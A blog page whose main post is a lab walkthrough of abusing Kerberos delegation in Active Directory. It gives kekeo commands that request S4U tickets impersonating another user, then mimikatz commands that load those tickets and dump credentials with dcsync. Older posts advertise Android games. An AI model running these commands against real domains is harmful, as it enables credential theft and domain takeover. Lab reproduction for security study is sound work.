quarta-feira, 16 de agosto de 2017

kekeo? where are you?

Sometimes, I find security related posts annoying and frustrating. When I try to reproduce their POC, sometimes there's no enough info, other times the tools they reference, don't exist anymore. This is the case for kekeo. Every single post I can find, uses two tools that I can not use, because they don't exist anymore: s4u.exe and asktgt.exe. These tools  where merged to a single one, and I wasn't able to find anything on the new syntax. All I could find was one guy complaining about the ticket generated by the new tool didn't have the forward flag active. That's why this tutorial was posted, to document the full attack to unconstrained delegation, step by step, in a reproduceble way. Let's begin.

Context: We have 2 DCs: dc01 and dc02. Domain name is contoso.loca. We will be using a service account named popo, registered with spn http/popo. We will grant delegation permissions to this account and will use it to obtain an AD admin token to dump user credential using dcsync.

1. Create the AD account that will be used as a delegated priviledged service
New-ADUser -Name "popo" -UserPrincipalName popo

2. Change the user password
net user popo popo!!popo /dom

3. Add the spn
setspn -S http/popo popo

4. Add  delegation permissions using dsa.msc. I added the permissions to transition protocol to ldap/dc01.contoso.loca, so that we can dump passwords from this service.

We now have everything we need to begin our tests. Let's first try to dump the domain administrator credentials from popo session. To do this, open mimikatz, and run:

lsadump::dcsync /domain:contoso.loca /user:CONTOSO\administrator

As you can see, access denied, as expected so far.
Now, here enters kekeo, run kekeo.exe and:

1. Request a tgt for popo from kerberos.

tgt::ask /domain:contoso.loca /user:popo /password:popo!!popo

it generates the ticket file TGT_popo@CONTOSO.LOCA_krbtgt~contoso.loca@CONTOSO.LOCA.kirbi

2. Using the popo tgt, request s4uself and s4u2proxy tickets.

tgs::s4u /tgt:TGT_popo@CONTOSO.LOCA_krbtgt~contoso.loca@CONTOSO.LOCA.kirbi /user:admin1 /service:ldap/dc01.contoso.loca

Two new ticket files are created:

Let's use those tickets now. run mimikatz.exe:

1.  Load the tickets, you need both of them loaded into memory.

kerberos::ptt TGS_admin1@CONTOSO.LOCA_popo@CONTOSO.LOCA.kirbi
kerberos::ptt TGS_admin1@CONTOSO.LOCA_ldap~dc01.contoso.loca@CONTOSO.LOCA.kirbi

2. List the tickets to validate they're loaded.

3. Dump the credentials using dcsync.

lsadump::dcsync /domain:contoso.loca /user:CONTOSO\admin1 /dc:dc01.contoso.loca

Et voilà!!!

quinta-feira, 18 de outubro de 2012

Chicken soccer extreme

How do chickens play soccer? Find out by playing this fantastic game!!!
 Available here.

segunda-feira, 8 de outubro de 2012


Sensational new football challenge by Gato Pinco! Help Crynaldo to keep the ball in the air as much timeas possible, or to collect the largest amount of coins! Take this amazing challenge! Show your skill! Help your playmaker to not throw a tantrum!
Goooooooooo Crynaldo! Don´t drop the ball!
The game is available at the following address in the android market: Crynaldo free. You can donate to the developer by downloading this version: Crynaldo donation.

terça-feira, 18 de setembro de 2012

Welcome to Art´s Sudoku, the ultimate sudoku puzzle!

Art the cat is very smart, a regular brainiac he is! He always gets the puzzles right, no mather how hard. Can you match is achievements? Don´t let the little number mice get the best of you! You can select the size and hardness of puzzle you want and you can challenge yourself, and Art the Cat, to be the biggest brain around!
Enjoy Art´s Sudoku Free, with hundreds puzzles in 7 different sizes and 6 dificulty levels, or upgrade to Arts Sudoku Brainiac Edition (payed version) with thousands of puzzles, no publicity and auto-save and save functionality so you can keep on playing your sudokus.

The game is available at the following address in the android market: Art's Sudoku. Donate to our projects by downloading this version instead: Art's Sudoku donation.


sexta-feira, 31 de agosto de 2012

Be mathed!

Beware of the newest and most exciting math game from GatoPinco!
Let your mind wonder through the colorful shiny numbers on the screen, searching for the right combinations. Add or multiply the necessary numbers to get to the expected result by selecting them in a horizontal or vertical row. The right combinations will blow away, making you want to find more and more and more right results!
Dare to BE MATHED! This game will blow your mind!
The free version is available at the following address in the android market: BeMathed free. The paid version can be downloaded from the here: BeMathed.

quinta-feira, 16 de agosto de 2012

Angry Bees

Pete the spider climbs his web,
Looking jolly happy!
Looking to snatch some honey
To prepare his party!

Pete the spider is a scoundrel
He ties up the merry bees
Wait til they get to his side
Thrown away he is!

Busy busy are the bees,
Flying all around!
If they catch that wretched spider,
They will kick him out!

Busy is the fat bee Jack
Flying oh so fast!
Soon he will kick Pete´s back-side
And he will splash flat!

Oh so busy is Maria,
Of the bees, she is the queen!
If Pete goes into to her space,
She will soon kick him!

Look out Pete!
Here comes the swarm!
Hurry with that jar!
Or else they will get you good,
Anf off you go, so far!

Poor Pete, he is just so greedy!
His sweet tooth wont let him rest!
If he gets away with it some,
He will feel the best!

As always, the free version is available at the following address in the android market: Angry Bees free. The paid version can be downloaded from the here: Angry Bees.

terça-feira, 24 de julho de 2012


It´s a hot summer day, and under the deep blue sky, the ocean hums silently.
You lay down  on  the sand, blinded  by  the  sun, refreshed by the cool breeze...
It´s time to play with the  pebbles that  the tide dragged in...
Use your imagination and rotate colorful pebbles of the same type into lines that  then vanish.
Your  objective? To make the  most pebbles deasapear as fast as you can.

The game is available in free and paid versions. The free version is available at the following address in the android market: Pebbles Free. The paid version can be downloaded from the here: Pebbles paid.